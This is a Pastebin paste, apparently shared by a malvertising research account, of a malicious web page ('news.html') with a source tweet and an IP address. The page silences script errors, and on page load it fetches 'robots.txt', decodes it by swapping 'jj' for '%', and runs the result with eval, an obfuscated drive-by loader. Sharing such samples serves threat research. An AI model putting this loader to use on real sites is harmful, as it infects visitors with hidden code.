Advertisement
StopMalvertising

news.html

Jan 8th, 2013
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1. https://twitter.com/PhysicalDrive0/statuses/288586871058100225
  2. 173.224.221.166
  3.  
  4. <!doctype html>
  5. <html>
  6. <head>
  7.  
  8. <script language="JavaScript">
  9. <!--
  10.  
  11. function SymError()
  12. {
  13. return true;
  14. }
  15.  
  16. window.onerror = SymError;
  17.  
  18. //-->
  19. </script>
  20.  
  21. <script>
  22. function ajax()
  23.  
  24. {
  25.  
  26. var xmlhttp_request = false;
  27.  
  28. try {
  29.  
  30. xmlhttp_request= new ActiveXObject('Msxml2.XMLHTTP');
  31.  
  32. } catch (e)
  33.  
  34. {
  35.  
  36. try {
  37.  
  38. xmlhttp_request= new ActiveXObject('Microsoft.XMLHTTP');
  39.  
  40. } catch (E) {
  41.  
  42. xmlhttp_request= null;
  43.  
  44. }
  45.  
  46. }
  47.  
  48. if (!xmlhttp_request && typeof XMLHttpRequest != 'undefined')
  49.  
  50. {
  51.  
  52. xmlhttp_request= new XMLHttpRequest();
  53.  
  54. }
  55.  
  56. return xmlhttp_request;
  57.  
  58. }
  59. function loader()
  60. {
  61. var xmlhttp = ajax();
  62. xmlhttp.open('get', 'robots.txt', false);
  63. xmlhttp.send();
  64. var page = xmlhttp.responseText;
  65. page=page.replace(/jj/g,"%");
  66. code=unescape(page);
  67. return code;
  68. }
  69.  
  70. function load()
  71. {
  72. eval(loader());
  73. }
  74. </script>
  75. </head>
  76. <body onload="load()">
  77. <form id="a">
  78. </form>
  79. <dfn id="b">
  80. </dfn>
  81. </body>
  82. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement